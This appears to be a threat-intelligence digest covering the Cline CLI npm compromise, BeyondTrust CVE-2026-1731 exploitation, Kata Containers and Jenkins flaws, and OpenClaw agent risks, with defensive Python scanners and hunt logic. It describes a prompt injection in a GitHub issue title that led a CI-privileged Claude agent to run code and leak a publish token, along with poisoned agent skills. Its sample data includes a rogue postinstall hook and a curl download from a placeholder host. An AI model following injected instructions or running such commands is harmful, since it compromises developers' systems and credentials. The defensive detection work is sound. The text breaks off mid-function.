Cline CLI 2.3.0 Supply Chain Attack Installed OpenClaw on Developer Systems

On February 17, 2026, the open-source, AI-powered coding assistant Cline CLI suffered a supply chain attack: version 2.3.0 was published to the npm registry with a compromised npm publish token and silently installed the OpenClaw autonomous AI agent on developer systems. The malicious package, downloaded approximately 4,000 times during an eight-hour window, carried a `postinstall` script that installed `openclaw@latest`. OpenClaw itself was not deemed malicious, but its installation was unauthorized and unintended by the Cline maintainers. The maintainers subsequently released version 2.4.0, deprecated 2.3.0, revoked the compromised token, and moved npm publishing to OpenID Connect (OIDC) via GitHub Actions. Users are advised to update Cline CLI and remove any unintended OpenClaw installations. The compromise is attributed to "Clinejection," a vulnerability discovered by Adnan Khan that exploits a misconfigured GitHub workflow in which an AI agent (Claude) with excessive permissions could be tricked, via prompt injection in a GitHub issue title, into executing arbitrary code. The attack used GitHub Actions cache poisoning to steal publication secrets, including the npm publish token, demonstrating a novel CI/CD attack surface involving AI agents and underscoring the need for robust governance of privileged AI actors.

Severity: Critical

Threat Details and IOCs

Victim Industries: Information Technology

Mitigation Advice

  • Scan all developer workstations and CI/CD environments to identify any installations of the `cline` npm package, specifically version `2.3.0`.
  • On any system where `cline@2.3.0` is found, immediately update the package to version `2.4.0` or later.
  • Scan all developer workstations and CI/CD environments for installations of the `openclaw` npm package and uninstall it immediately if its presence is not explicitly authorized by the security team.

Compliance Best Practices

  • For all internally developed software, migrate CI/CD publishing pipelines from using static, long-lived API tokens to short-lived, tokenless authentication mechanisms like OpenID Connect (OIDC).
  • After migrating to a trusted publishing mechanism like OIDC, configure your package registries to explicitly disable authentication via traditional, static API tokens for your organization's software packages.
  • Establish a formal security policy for the use of AI agents in CI/CD pipelines, and conduct regular audits to ensure these agents operate under the principle of least privilege.
  • Review and re-architect CI/CD pipelines to enforce strict separation between workflows, ensuring that low-trust jobs (like issue triaging) cannot write to or influence caches consumed by high-trust jobs (like release publishing).
  • Implement a Software Composition Analysis (SCA) tool to automatically scan third-party dependencies for risky characteristics, such as the presence of `postinstall` scripts, before they are approved for developer use.
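As an added example (not Cline's or npm's own tooling) covering the three mitigation checks and the SCA install-script check above: a scanner that walks node_modules trees and a v2/v3 package-lock.json for cline@2.3.0, any openclaw package, and packages with install-time scripts. The sample tree it builds is constructed to mirror the incident description, not a real capture.

```python
"""Scan npm trees for the compromised cline@2.3.0 release, stray openclaw
packages and install-time scripts (preinstall/install/postinstall)."""
import json
import os
import tempfile
from collections import namedtuple
from pathlib import Path

COMPROMISED = {"cline": {"2.3.0"}}     # releases known to be malicious
UNWANTED = {"openclaw"}                 # must not be present unless approved
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
# kind is one of: compromised-release | unwanted-package | install-hooks
Finding = namedtuple("Finding", "kind name version where detail")


def _classify(name, version, scripts, where):
    """Apply the three checks to one package record (manifest or lockfile)."""
    out = []
    if version in COMPROMISED.get(name, ()):
        out.append(Finding("compromised-release", name, version, where, "update to 2.4.0 or later"))
    if name in UNWANTED:
        out.append(Finding("unwanted-package", name, version, where, "uninstall unless approved"))
    hooks = {h: scripts[h] for h in INSTALL_HOOKS if h in (scripts or {})}
    if hooks:
        out.append(Finding("install-hooks", name, version, where, json.dumps(hooks)))
    return out


def iter_package_manifests(root):
    """Yield node_modules/<pkg>/package.json, including scoped @org/<pkg>."""
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" not in files:
            continue
        p = Path(dirpath)
        if p.parent.name == "node_modules" or (
                p.parent.name.startswith("@") and p.parent.parent.name == "node_modules"):
            yield p / "package.json"


def scan_tree(root):
    """Inspect every installed manifest below root (project dir or `npm root -g`)."""
    findings = []
    for manifest in iter_package_manifests(root):
        try:
            meta = json.loads(manifest.read_text(encoding="utf-8"))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip it, keep scanning
        findings += _classify(meta.get("name", ""), meta.get("version", ""),
                              meta.get("scripts"), str(manifest))
    return findings


def scan_lockfile(lock_path):
    """Inspect a v2/v3 package-lock.json: catches versions pinned but not yet
    installed, and uses its hasInstallScript flag to spot install hooks."""
    data = json.loads(Path(lock_path).read_text(encoding="utf-8"))
    findings = []
    for key, entry in (data.get("packages") or {}).items():
        if "node_modules/" not in key:
            continue  # the "" key is the root project itself
        name = key.rsplit("node_modules/", 1)[1]
        version = entry.get("version", "")
        findings += _classify(name, version, None, str(lock_path))
        if entry.get("hasInstallScript"):
            findings.append(Finding("install-hooks", name, version, str(lock_path),
                                    "hasInstallScript set in lockfile"))
    return findings


def summarize(findings):
    """kind -> sorted package names, de-duplicated across manifests and lockfile."""
    out = {}
    for f in findings:
        out.setdefault(f.kind, set()).add(f.name)
    return {k: sorted(v) for k, v in out.items()}


def build_sample_tree(base):
    """Constructed sample, not a real capture: modelled on the incident description."""
    base = Path(base)
    manifests = {
        "node_modules/cline": {"name": "cline", "version": "2.3.0",
                               "scripts": {"postinstall": "npm i -g openclaw@latest"}},
        "node_modules/openclaw": {"name": "openclaw", "version": "0.0.0-sample"},
        "node_modules/@types/node": {"name": "@types/node", "version": "22.0.0"},  # benign
    }
    for rel, meta in manifests.items():
        (base / rel).mkdir(parents=True)
        (base / rel / "package.json").write_text(json.dumps(meta), encoding="utf-8")
    lock = {"lockfileVersion": 3, "packages": {
        "": {"name": "sample-app", "version": "1.0.0"},
        "node_modules/cline": {"version": "2.3.0", "hasInstallScript": True},
        "node_modules/openclaw": {"version": "0.0.0-sample"},
    }}
    (base / "package-lock.json").write_text(json.dumps(lock), encoding="utf-8")
    return base


def run_demo():
    """Scan the constructed sample tree and return the summary."""
    with tempfile.TemporaryDirectory() as tmp:
        root = build_sample_tree(tmp)
        return summarize(scan_tree(root) + scan_lockfile(root / "package-lock.json"))
```

Running `run_demo()` on the sample reports cline as both a compromised release and an install-hook package, and openclaw as an unwanted package, while the benign scoped package produces no finding.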


VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)

A critical pre-authentication remote code execution vulnerability, CVE-2026-1731 (CVSS v4 9.9), has been identified in the thin-scc-wrapper WebSocket handler of BeyondTrust Remote Support, enabling OS command injection. Active exploitation has been observed, resulting in the deployment of web shells and backdoors (including SparkRAT and VShell), account creation, lateral movement, and data exfiltration. The activity has affected organizations in the financial services, legal, high tech, higher education, wholesale/retail, and healthcare sectors in the U.S., France, Germany, Australia, and Canada. The vulnerability was added to CISA's Known Exploited Vulnerabilities Catalog on February 13, 2026, with over 10,600 exposed instances identified. Attackers exploit this public-facing application (MITRE T1190) by injecting a crafted remoteVersion payload during the WebSocket handshake. Indicators of Compromise include C2 addresses such as 23.162.40[.]187 and 138.197.14[.]95/ws, malicious domains such as q0r2e5q2dzbykcox9qmkptm12s8mwb.oastify[.]com, file hashes for SparkRAT (9f431d5549a03aee92cfd2bdbbe90f1c91e965c99e90a0c9ad5a001f4e80c350) and VShell (98a7b0900a9072bb40af579ec372da7b27af12b15868394df51fefe290ab176b), and filenames such as aws.php and blue.drx. Recommended mitigations include applying the vendor patches for the affected BeyondTrust Remote Support and Privileged Remote Access versions and restricting access to administrative interfaces through segmentation or zero-trust principles.

Severity: Critical

Threat Details and IOCs

Malware: AntSword, BADIIS, China Chopper, Chrysalis, DragonForce, Evilmouse, HackTool:Win32/Impacket, Impacket, Meterpreter, Netdragon, SimpleHelp, SparkRAT, VShell
CVEs: CVE-2024-12356, CVE-2024-12686, CVE-2024-43468, CVE-2025-1094, CVE-2025-15556, CVE-2025-26399, CVE-2025-40536, CVE-2025-40551, CVE-2026-1281, CVE-2026-1731, CVE-2026-20700
Technologies: Apache HTTP Server, Apple iOS, Apple macOS, BeyondTrust Privileged Access Management, BeyondTrust Remote Support, GNU Bash, Linux, Microsoft Active Directory, Microsoft Configuration Manager, Microsoft Windows, Microsoft Windows Server, Notepad++, PHP, SolarWinds Web Help Desk
Threat Actors: Billbug, BronzeElgin, DragonSpark, FlaxTyphoon, G0030, Hafnium, LotusBlossom, LotusPanda, RaspberryTyphoon, RedDev13, SaltTyphoon, SilkTyphoon, SpringDragon, Thrip, VoltTyphoon
Attacker Countries: China, Iran, Russia
Attacker Emails: hello@hacktron.ai
Victim Industries: Aerospace, Agriculture, Automotive, Chemical, Commercial Facilities, Communication Services, Critical Manufacturing, Dams, Defense, Defense Industrial Base, Education, Emergency Services, Energy, Financial Services, Government, Healthcare, Hospitality, Information Technology, Law Enforcement, Legal Services, Manufacturing, Media and Entertainment, Multimedia, Nuclear Reactors, Materials, and Waste, Public Health, Retail, Technology Hardware, Telecommunications, Transportation, Utilities, Water & Wastewater, Wholesale
Victim Countries: Australia, Canada, France, Germany, Hong Kong, Indonesia, Philippines, Taiwan, United States, Vietnam

Mitigation Advice

  • Immediately apply the vendor-supplied patches for all vulnerable BeyondTrust Remote Support and Privileged Remote Access instances to remediate CVE-2026-1731.
  • Add the attacker IP addresses listed in the article's Indicators of Compromise, including 23.162.40.187 and 138.197.14.95, to the blocklist on network firewalls and web proxies.
  • Block the malicious domains and URLs listed in the article's Indicators of Compromise within your DNS filtering service and web proxy.
  • Add the file hashes for SparkRAT, VShell, and other malware artifacts provided in the article to your Endpoint Detection and Response (EDR) or antivirus solution's blocklist.
  • Scan all public-facing web servers for the presence of files named 'aws.php', 'file_save.php', and 'blue.drx' to identify potential webshells.
  • Audit authentication logs on BeyondTrust servers and connected systems for any unauthorized or suspicious user accounts created since the vulnerability was disclosed.
  • Run the provided XQL detection queries in your SIEM or XDR to hunt for signs of post-exploitation activity on Windows and Linux systems related to this threat.

Compliance Best Practices

  • Develop and implement a network segmentation strategy to isolate public-facing administrative tools like BeyondTrust from the internal corporate network.
  • Initiate a project to implement Zero Trust principles for all administrative applications, ensuring every access request is strictly authenticated and authorized based on user and device context.
  • Establish a continuous External Attack Surface Management (EASM) program to discover, inventory, and assess the security of all internet-facing assets.
  • Configure network firewalls to enforce a default-deny policy for all outbound traffic from server segments, allowing only explicitly approved protocols and destinations required for business functions.
  • Deploy a Web Application Firewall (WAF) in front of all public-facing applications to protect against command injection, cross-site scripting, and other web application attacks.

Sources

https://arcticwolf.com/resources/blog/cve-2026-1731/

https://arcticwolf.com/resources/blog/update-arctic-wolf-observes-threat-campaign-targeting-beyondtrust-remote-support-following-cve-2026-1731-poc-availability/

https://cyberpress.org/beyondtrust-0-day-vulnerability/

https://cyberpress.org/beyondtrust-flaw/

https://cyberpress.org/patch-immediately-beyondtrust/

https://cyberveille.esante.gouv.fr/alertes/beyondtrust-cve-2026-1731-2026-02-09

https://darkwebinformer.com/critical-pre-auth-rce-vulnerability-in-beyondtrust-remote-support-pra-allegedly-exposes-thousands-of-instances-cve-2026-1731/

https://gbhackers.com/attackers-exploit-critical-beyondtrust-flaw/

https://gbhackers.com/beyondtrust-rce-vulnerability-under-active-exploitation/

https://gbhackers.com/beyondtrust-remote-access-0-day-rce/

https://gbhackers.com/beyondtrust-vulnerability/

https://horizon3.ai/attack-research/vulnerabilities/cve-2026-1731/

https://orca.security/resources/blog/cve-2026-1731-beyondtrust-vulnerability/

https://securityonline.info/exploited-in-the-wild-critical-beyondtrust-flaw-cvss-9-9-opens-door-to-network-takeover/

https://socradar.io/blog/cve-2026-1731-rce-beyondtrust-rs-pra/

https://sploitus.com/exploit?id=03974D49-2414-56D4-AE7F-D90CD6138171

https://sploitus.com/exploit?id=51382817-068E-51A1-A291-B0F91FEAB101

https://sploitus.com/exploit?id=PACKETSTORM:215712

https://thehackernews.com/2026/02/beyondtrust-fixes-critical-pre-auth-rce.html

https://thehackernews.com/2026/02/researchers-observe-in-wild.html

https://threatprotect.qualys.com/2026/02/16/cisa-added-beyondtrust-vulnerability-to-its-known-exploited-vulnerabilities-catalog-cve-2026-1731/

https://www.bleepingcomputer.com/news/security/cisa-orders-feds-to-patch-beyondtrust-flaw-within-three-days/

https://www.bleepingcomputer.com/news/security/critical-beyondtrust-rce-flaw-now-exploited-in-attacks-patch-now/

https://www.cyberkendra.com/2026/02/ai-discovers-critical-zero-click-flaw.html

https://www.esecurityplanet.com/threats/beyondtrust-rce-exploited-for-domain-control/

https://www.esecurityplanet.com/threats/beyondtrust-vulnerability-allows-pre-auth-remote-code-execution/

https://www.helpnetsecurity.com/2026/02/09/beyondtrust-remote-access-vulnerability-cve-2026-1731/

https://www.helpnetsecurity.com/2026/02/13/beyondtrust-cve-2026-1731-poc-exploit-activity/

https://www.hendryadrian.com/beyondtrust-warns-of-critical-rce-flaw-in-remote-support-software/

https://www.hendryadrian.com/vshell-and-sparkrat-observed-in-exploitation-of-beyondtrust-critical-vulnerability-cve-2026-1731/

https://www.hkcert.org/security-bulletin/beyondtrust-products-remote-code-execution-vulnerability_20260212

https://www.techzine.eu/news/security/138638/beyondtrust-remote-support-has-a-critical-vulnerability/


Kata Containers Cloud Hypervisor Guest VM Root RCE (CVE-2026-24834)

CVE-2026-24834 represents a critical privilege escalation vulnerability (CVSS 9.3) affecting Kata Containers versions prior to 3.27.0 when configured with Cloud Hypervisor as the Virtual Machine Monitor (VMM). This flaw allows a user already within a Kata container to achieve arbitrary code execution as root inside the guest micro VM. The vulnerability stems from a breakdown in isolation, enabling direct manipulation of the underlying guest micro VM's filesystem from within the container environment. Attackers can exploit this by injecting malicious code, modifying critical system files, or replacing binaries, thereby gaining full root access within the guest VM. While the host system and other VMs remain unaffected, a specific edge case for arm64 QEMU setups lacking NVDIMM read-only support could theoretically allow guest writes to the image file itself. Exploitation requires an attacker to have access to a running container instance utilizing Cloud Hypervisor. Remediation involves updating Kata Containers to version 3.27.0 or any subsequent release to address the core issue of guest filesystem manipulation.

Severity: High

Threat Details and IOCs

CVEs: CVE-2026-24834
Technologies: Cloud Hypervisor, Kata Containers, Linux
Victim Industries: Cloud Infrastructure

Mitigation Advice

  • Inventory all systems to identify which are running Kata Containers with Cloud Hypervisor as the Virtual Machine Monitor (VMM).
  • Update all identified vulnerable Kata Containers deployments (versions prior to 3.27.0) to version 3.27.0 or newer.
  • Implement file integrity monitoring (FIM) rules to detect and alert on any modifications to critical system files (e.g., /bin/sh, /etc/ld.so.preload, systemd unit files) within Kata guest micro VMs.

Compliance Best Practices

  • Review and harden security configurations for all container images and runtime environments to minimize the risk of initial access, enforcing the principle of least privilege for all containerized processes.
  • Establish and maintain a comprehensive Software Bill of Materials (SBOM) for all containerized environments to enable rapid identification of vulnerable components and their specific configurations.
  • Evaluate and deploy a container runtime security solution to provide advanced threat detection for anomalous activities, including container escape attempts and unauthorized filesystem access.
  • Review and formalize the patch management policy to include aggressive SLAs for critical vulnerabilities affecting containerization and virtualization infrastructure.


Running OpenClaw Safely: Identity, Isolation, and Runtime Risk

Self-hosted agent runtimes, such as OpenClaw, introduce significant security risks by processing untrusted input and executing external code (skills) with persistent credentials, effectively shifting the security boundary and leading to potential credential exfiltration, agent state manipulation, and host compromise. To mitigate these, a minimum safe operating posture mandates deploying agents in isolated environments with dedicated, non-privileged credentials and non-sensitive data, alongside continuous monitoring for state changes, regular rebuilds, and robust backup strategies. Key attack vectors include indirect prompt injection via malicious content and "poisoned skills" from public registries, which can lead to unauthorized state access, privilege reuse, and persistent configuration changes. Effective defense requires comprehensive controls across identity, endpoint, supply chain, network, and data protection, supported by continuous monitoring and specific hunting queries to detect anomalous agent activities like unexpected skill installs, listening services, or shell spawning.

Severity: Critical

Threat Details and IOCs

Malware: AMOS, Atomic macOS Stealer, Atomic Stealer, BadIIS, Broomstick, ClawdBot Agent, CleanUp, CleanUpLoader, ConnectWise Control, ConnectWise ScreenConnect, GhostChat, GORBLE, Lumma, LummaC2, Lumma Stealer, OSX.AtomicStealer, OSX.AtomStealer, OysterLoader, POWERSTAR, Redline, Redline Loader, RedLine Stealer, Rhysida, RisePro, ScreenConnect, ScreenConnect RAT, Speldings.exe, StealC, TAMECAT, Trojan/OpenClaw.PolySkill, Vidar, Vidar Stealer
CVEs: CVE-2024-28863, CVE-2025-49596, CVE-2025-52882, CVE-2025-59466, CVE-2025-64756, CVE-2025-6514, CVE-2026-21636, CVE-2026-22708, CVE-2026-24763, CVE-2026-25157, CVE-2026-25253, CVE-2026-2577, CVE-2026-26319, CVE-2026-26322, CVE-2026-26329
Technologies: Alibaba Cloud, Amazon Web Services, Anthropic Claude, Apache HTTP Server, Apple iOS, Apple macOS, Caddy, Cloudflare Tunnel, ConnectWise ScreenConnect, DigitalOcean, Docker, Express.js, F5 NGINX, Git, GitHub, Google Cloud Platform, Google Gemini, Hetzner, Joomla!, Kubernetes, Linux, LLaVA, Microsoft Azure, Microsoft Entra, Microsoft Visual Studio, Microsoft Windows, Moltbook, NGINX, Node.js, npm, OpenAI, OpenClaw, OVHcloud, Python, Signal, Slack, SSH, Supabase, Tassos Framework, Telegram, Tencent Cloud, Vercel Next.js, WhatsApp
Threat Actors: AngryLikho, APT28, ClawHavoc, CookieSpider, FancyBear, hightower6eu, Kimsuky, Moonshine100rze, Rhysida
Attacker Countries: Russia
Victim Industries: Agriculture, Artificial Intelligence, Cloud Infrastructure, Creator Economy, Critical Manufacturing, Cryptocurrency, E-commerce, Education, Energy, Financials, Financial Services, Government, Healthcare, Health Care Technology, Hospitality, Information Services, Information Technology, Insurance, Legal Services, Manufacturing, Marketing & Advertising, Media and Entertainment, Multimedia, Non-Governmental Organizations (NGOs), Real Estate, Retail, Social Media, Software, Sports and Entertainment, Technology Hardware, Telecommunications, Transportation
Victim Countries: Australia, Austria, Belgium, Brazil, Bulgaria, Canada, China, Colombia, Croatia, Cyprus, Czech Republic, Denmark, Estonia, Finland, France, Germany, Greece, Hong Kong, Hungary, India, Ireland, Italy, Japan, Latvia, Lithuania, Luxembourg, Malta, Mexico, Netherlands, Norway, Poland, Portugal, Romania, Russia, Singapore, Slovakia, Slovenia, South Korea, Spain, Sweden, Switzerland, United Kingdom, United States

Mitigation Advice

  • Using Microsoft Defender XDR, run a hunt query against `DeviceProcessEvents` to search for process command lines or filenames containing 'openclaw', 'moltbot', or 'clawdbot' on endpoints.
  • Using Microsoft Defender XDR, run a hunt query against `CloudProcessEvents` to search for process command lines or filenames containing 'openclaw', 'moltbot', or 'clawdbot' in cloud workloads.
  • Using Microsoft Defender XDR, run a hunt query against `DeviceProcessEvents` to find command lines containing 'clawhub install' to identify which skills are being installed and by whom.
  • Using Microsoft Defender XDR, run a hunt query to detect processes like 'openclaw' spawning shells ('cmd.exe', 'powershell.exe', 'bash') or download tools ('curl', 'wget').
  • Using Microsoft Defender XDR, run a hunt query against `DeviceNetworkEvents` to find any listening connections created by processes associated with 'openclaw', 'moltbot', or 'clawdbot'.
  • If an unauthorized OpenClaw runtime is discovered on a device, use Microsoft Defender for Endpoint to isolate the device from the network while investigation occurs.
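As an added example (not code from the page or from Microsoft), the five hunts above expressed as plain Python so the same logic can be checked offline or ported to another SIEM. It runs over constructed sample rows shaped like Defender's DeviceProcessEvents and DeviceNetworkEvents tables; the field names are assumed from that schema, and the hosts, accounts and addresses are placeholders.

```python
"""Offline equivalents of the five Defender XDR hunts for OpenClaw / Moltbot /
Clawdbot activity, applied to constructed sample events."""

AGENT_MARKERS = ("openclaw", "moltbot", "clawdbot")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh", "zsh"}
DOWNLOAD_TOOLS = {"curl", "curl.exe", "wget", "wget.exe"}


def _mentions_agent(*fields):
    """True if any of the given fields names an agent runtime (case-insensitive)."""
    blob = " ".join(f or "" for f in fields).lower()
    return any(marker in blob for marker in AGENT_MARKERS)


def find_agent_processes(process_events):
    """Hunts 1 and 2: processes whose file name or command line names an agent."""
    return [ev for ev in process_events
            if _mentions_agent(ev.get("FileName"), ev.get("ProcessCommandLine"))]


def find_skill_installs(process_events):
    """Hunt 3: 'clawhub install' invocations, with the installing account and skill."""
    hits = []
    for ev in process_events:
        cmd = (ev.get("ProcessCommandLine") or "").lower()
        if "clawhub install" not in cmd:
            continue
        rest = cmd.split("clawhub install", 1)[1].split()
        hits.append({"device": ev.get("DeviceName"), "account": ev.get("AccountName"),
                     "skill": rest[0] if rest else None})
    return hits


def find_agent_spawned_tools(process_events):
    """Hunt 4: an agent process spawning a shell or a download tool."""
    hits = []
    for ev in process_events:
        child = (ev.get("FileName") or "").lower()
        if child in (SHELLS | DOWNLOAD_TOOLS) and _mentions_agent(
                ev.get("InitiatingProcessFileName"), ev.get("InitiatingProcessCommandLine")):
            hits.append(ev)
    return hits


def find_agent_listeners(network_events):
    """Hunt 5: listening sockets opened by an agent process."""
    return [ev for ev in network_events
            if ev.get("ActionType") == "ListeningConnectionCreated"
            and _mentions_agent(ev.get("InitiatingProcessFileName"),
                                ev.get("InitiatingProcessCommandLine"))]


def run_hunts(process_events, network_events):
    """Run all hunts and return a hit count per hunt for quick triage."""
    return {
        "agent_processes": len(find_agent_processes(process_events)),
        "skill_installs": len(find_skill_installs(process_events)),
        "agent_spawned_tools": len(find_agent_spawned_tools(process_events)),
        "agent_listeners": len(find_agent_listeners(network_events)),
    }


# Constructed sample rows shaped like DeviceProcessEvents / DeviceNetworkEvents
# (field names assumed from the Defender schema; hosts, users and 203.0.113.10
# are placeholders, not real indicators).
_AGENT_CMD = "node /home/alice/.npm-global/bin/openclaw gateway"
SAMPLE_PROCESS_EVENTS = [
    {"DeviceName": "dev-laptop-01", "AccountName": "alice", "FileName": "node",
     "ProcessCommandLine": _AGENT_CMD,
     "InitiatingProcessFileName": "bash", "InitiatingProcessCommandLine": "bash -l"},
    {"DeviceName": "dev-laptop-01", "AccountName": "alice", "FileName": "node",
     "ProcessCommandLine": "node /home/alice/.npm-global/bin/clawhub install weather-helper",
     "InitiatingProcessFileName": "bash", "InitiatingProcessCommandLine": "bash -l"},
    {"DeviceName": "dev-laptop-01", "AccountName": "alice", "FileName": "curl",
     "ProcessCommandLine": "curl -fsSL http://203.0.113.10/setup.sh",
     "InitiatingProcessFileName": "node", "InitiatingProcessCommandLine": _AGENT_CMD},
    {"DeviceName": "dev-pc-02", "AccountName": "bob", "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -NoProfile -Command Get-Process",
     "InitiatingProcessFileName": "node.exe",
     "InitiatingProcessCommandLine": r"node.exe C:\Users\bob\AppData\Roaming\npm\node_modules\openclaw\dist\gateway.js"},
    {"DeviceName": "build-01", "AccountName": "ci", "FileName": "bash",  # benign: a CI test run
     "ProcessCommandLine": "bash -c 'npm test'",
     "InitiatingProcessFileName": "node", "InitiatingProcessCommandLine": "node npm-cli.js test"},
]
SAMPLE_NETWORK_EVENTS = [
    {"DeviceName": "dev-laptop-01", "ActionType": "ListeningConnectionCreated", "LocalPort": 18789,
     "InitiatingProcessFileName": "node", "InitiatingProcessCommandLine": _AGENT_CMD},
    {"DeviceName": "dev-laptop-01", "ActionType": "ConnectionSuccess", "LocalPort": 51234,
     "InitiatingProcessFileName": "node", "InitiatingProcessCommandLine": _AGENT_CMD},
    {"DeviceName": "web-01", "ActionType": "ListeningConnectionCreated", "LocalPort": 443,
     "InitiatingProcessFileName": "nginx", "InitiatingProcessCommandLine": "nginx: master process"},
]
```

On the sample, hunt 4 fires twice (the agent spawning curl on Linux and powershell.exe on Windows) while the CI job's bash child and the agent's outbound connection produce no hits.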

Compliance Best Practices

  • Develop and enforce a security policy that requires any evaluation or use of self-hosted agent runtimes like OpenClaw to occur only on dedicated, isolated virtual machines or separate physical systems.
  • Establish a process to issue dedicated, least-privilege service accounts with short-lived tokens for any approved AI agent runtime.
  • In Microsoft Entra ID, configure and enforce admin consent workflows to prevent users from granting permissions to new or risky OAuth applications, especially those with high-privilege scopes.
  • Deploy Microsoft Purview Endpoint Data Loss Prevention (DLP) policies to audit and block agent processes from accessing or exfiltrating data marked with sensitive labels.
  • Use an application control solution, such as Microsoft Defender Application Control, to create policies that restrict agent runtimes from installing skills or extensions from unapproved publishers or repositories.
  • For any approved agent host, configure host-based or network firewalls to enforce strict egress filtering, allowing outbound connections only to a pre-approved list of destinations.
  • Develop a specific incident response playbook for compromised AI agents, detailing steps for isolation, credential rotation, state/memory forensics, and restoration from a known-good backup.

Sources

https://cyberinsider.com/critical-1-click-rce-bug-in-openclaw-enables-full-system-takeover-and-data-theft/

https://cyberinsider.com/infostealer-malware-now-targeting-openclaw-ai-environments/

https://cyberpress.org/1-click-clawdbot-vulnerability/

https://cyberpress.org/clawhavoc-poisons-openclaws-clawhub-with-1184-malicious-skills/

https://cyberpress.org/hackers-exploit-openclaw-configurations/

https://cyberpress.org/joomla-novarain-tassos-framework-flaws/

https://cyberpress.org/log-poisoning-vulnerability/

https://cyberpress.org/moltbot-operators-leak-control-panels-via-exposed-mdns-traffic/

https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys

https://gbhackers.com/15200-openclaw-control-panels-exposed/

https://gbhackers.com/1-click-flaw-in-clawdbot/

https://gbhackers.com/abuse-of-openclaw-ai-capabilities-enables-stealthy-malware/

https://gbhackers.com/openclaw-2026-2-12-released/

https://gbhackers.com/openclaw-configurations/

https://hackread.com/infostealer-steal-openclaw-ai-identity-memory-files/

https://nsfocusglobal.com/openclaw-open-source-ai-agent-application-attack-surface-and-security-risk-system-analysis/

https://osintteam.blog/why-moltbook-is-dangerous-critical-zero-days-found-in-my-audit-full-report-39a721e5dfb0?source=rss----2983bc435765---4

https://securityboulevard.com/2026/02/42900-openclaw-exposed-control-panels-and-why-you-should-care/

https://securityboulevard.com/2026/02/the-agentic-virus-how-ai-agents-become-self-spreading-malware/

https://securityonline.info/one-click-to-god-mode-the-critical-openclaw-flaw-that-handed-attackers-your-master-keys/

https://socradar.io/blog/cve-2026-25253-rce-openclaw-auth-token/

https://sploitus.com/exploit?id=200AAF0D-8E2F-5BF9-9AA0-40C1A1A23652

https://thehackernews.com/2026/01/fake-moltbot-ai-coding-assistant-on-vs.html

https://thehackernews.com/2026/02/openclaw-integrates-virustotal-scanning.html

https://the-sequence.com/openclaw-security-risks-autonomous-ai-agents

https://www.androidheadlines.com/2026/02/openclaw-explained-ai-agent-security-risks-moltbot-clawdbot-features.html

https://www.bitdefender.com/en-us/blog/businessinsights/technical-advisory-openclaw-exploitation-enterprise-networks

https://www.bleepingcomputer.com/news/security/viral-moltbot-ai-assistant-raises-concerns-over-data-security/

https://www.cyberkendra.com/2026/01/openclaw-hacked-by-ai.html

https://www.esecurityplanet.com/threats/fake-clawdbot-vs-code-extension-deploys-screenconnect-rat/

https://www.esecurityplanet.com/threats/openclaw-flaw-enables-ai-log-poisoning-risk/

https://www.esecurityplanet.com/threats/openclaws-rapid-rise-exposes-thousands-of-ai-agents-to-the-public-internet/

https://www.kaspersky.com/blog/moltbot-enterprise-risk-management/55317/

https://www.malwarebytes.com/blog/threat-intel/2026/01/clawdbots-rename-to-moltbot-sparks-impersonation-campaign

https://www.microsoft.com/en-us/security/blog/2026/02/19/running-openclaw-safely-identity-isolation-runtime-risk/

https://www.securityjoes.com/post/hunting-openclaw-detection-and-containment-guidance-for-defenders

https://www.techzine.eu/news/security/138633/over-40000-openclaw-agents-vulnerable/

https://www.techzine.eu/news/security/138835/infostealer-steals-identity-of-ai-agent-openclaw/

https://www.tenable.com/blog/agentic-ai-security-how-to-mitigate-clawdbot-moltbot-openclaw-vulnerabilities

https://www.thehackerwire.com/openclaw-client-side-websocket-token-leak-cve-2026-25253/

https://www.thehackerwire.com/openclaw-docker-sandbox-command-injection-cve-2026-24763/

https://www.theregister.com/2026/02/09/openclaw_instances_exposed_vibe_code/


CI/CD at Risk: High-Severity Jenkins XSS Flaw Exposes Build Environments

Jenkins maintainers have issued critical security updates addressing two vulnerabilities in Jenkins core: a high-severity stored Cross-Site Scripting (XSS) flaw (CVE-2026-27099) and a medium-severity information disclosure issue (CVE-2026-27100). The XSS vulnerability, affecting Jenkins weekly 2.550 and earlier and LTS 2.541.1 and earlier, stems from improper sanitization of user-provided descriptions for offline nodes; attackers with Agent/Configure or Agent/Disconnect permission can inject scripts that execute in the browsers of users viewing the node's status. The information disclosure flaw, present in the same versions, lets attackers with Item/Build and Item/Configure permission use the "Run Parameter" feature to determine the existence and display names of jobs and builds they are not authorized to access, providing a reconnaissance vector. To mitigate these risks, administrators should update to Jenkins weekly 2.551 or LTS 2.541.2.

Severity: Critical

Threat Details and IOCs

Malware: Defray, Defray777, RansomEXX, Ransom X
CVEs: CVE-2026-27099, CVE-2026-27100
Technologies: Jenkins
Victim Industries: Financial Services, Healthcare, Information Technology, Manufacturing, Retail, Software

Mitigation Advice

  • Update all Jenkins weekly instances from vulnerable versions (up to 2.550) to the patched version 2.551 or later.
  • Update all Jenkins Long-Term Support (LTS) instances from vulnerable versions (up to 2.541.1) to the patched version 2.541.2 or later.
  • Audit and temporarily restrict 'Agent/Configure' and 'Agent/Disconnect' permissions in Jenkins to only essential, trusted administrative accounts.
  • Conduct an immediate review of all accounts with 'Item/Build' and 'Item/Configure' permissions in Jenkins and remove any that are non-essential.
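As an added example, not Jenkins project code: a fleet triage helper that classifies reported versions (for instance the value of the X-Jenkins response header) against the two fix lines above, treating three-component versions as LTS and two-component versions as weekly so the two lines are compared separately. The host inventory is constructed.

```python
"""Classify Jenkins versions against the fix lines for CVE-2026-27099 and
CVE-2026-27100: weekly 2.551, LTS 2.541.2."""
import re

FIXED = {"weekly": (2, 551), "lts": (2, 541, 2)}
# LTS releases carry three components (2.541.1), weekly releases two (2.550).
_VERSION_RE = re.compile(r"\s*(\d+)\.(\d+)(?:\.(\d+))?\s*")


def parse_version(text):
    """'2.541.1' -> (2, 541, 1); raises ValueError on anything else."""
    m = _VERSION_RE.fullmatch(text or "")
    if not m:
        raise ValueError(f"unrecognised Jenkins version: {text!r}")
    return tuple(int(g) for g in m.groups() if g is not None)


def release_line(version):
    """Three components means an LTS baseline plus patch level."""
    return "lts" if len(version) == 3 else "weekly"


def is_vulnerable(text):
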